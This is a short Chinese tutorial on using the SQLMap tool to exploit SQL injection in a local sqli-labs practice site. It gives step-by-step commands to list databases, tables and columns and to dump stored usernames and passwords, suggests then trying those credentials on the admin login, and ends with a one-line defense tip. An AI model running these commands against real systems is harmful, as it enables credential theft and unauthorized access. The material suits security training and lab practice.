黑客技术——SQLMAP获取后台账号密码

BY 马丁

一． SQLmap

SQLMap是一个自动化注入工具，其主要功能是扫描、发现并利用给定的URL的SQL注入漏洞，内置了很多绕过插件。支持的数据库Mysql、Oracle、SQL Server等众多数据库。

二． 常见注入类型

ü 布尔类型盲注，即可以根据返回页面判断条件真假的注入

ü 基于时间的盲注，即不能根据返回页面的内容判断任何信息，要用条件语句查看时间的延迟语句是否已执行(页面返回时间的增加)来判断

ü 基于报错注入，即页面会返回错误信息，或者把注入的语句的结果直接返回到页面中

ü 联合查询注入，在可以使用Union的情况下的注入

ü 堆查询注入，可以使用多条执行语句时的注入

三． 所用环境及工具

ü Python 2.7.8

ü SQLMap 1.4

ü Sqlilabs

四． 步骤

1. 安装SQLMap需要安装python环境(不支持python3)，实验中使用到的环境是python 2.7.8。安装好了过后如下图。

2. 把SQLMap安装包放入python的安装目录下面，进入到SQLMap的目录。

3. 判断目标URL是否存在注入点。检测出注入点，便进一步查询数据库。

4. 查询当前用户下的所有数据库名称 sqlmap.py -u "
http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --dbs

5. 查询当前使用的数据库 sqlmap.py -u "
http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --current-db 获取当前数据库的名称

6. 进而查询当前数据中的表 sqlmap.py -u "
http://127.0.0.1/sqli-labs-master/Less-1/?id=1" -D security –tables

7. 知道了表过后，就可以来查询表中的字段了 sqlmap.py -u "
http://127.0.0.1/sqli-labs-master/Less-1/?id=1" -D security -T users –columns

8. 查询出了字段过后，就可以来查寻表中的数据了，也就是账号密码。得到帐户密码过后，可以寻找后台地址来尝试登陆。

sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" -D security -T users -C password,username –dump

五． SQL注入的防御

对客户端提交的代码进行严格的转义和过滤。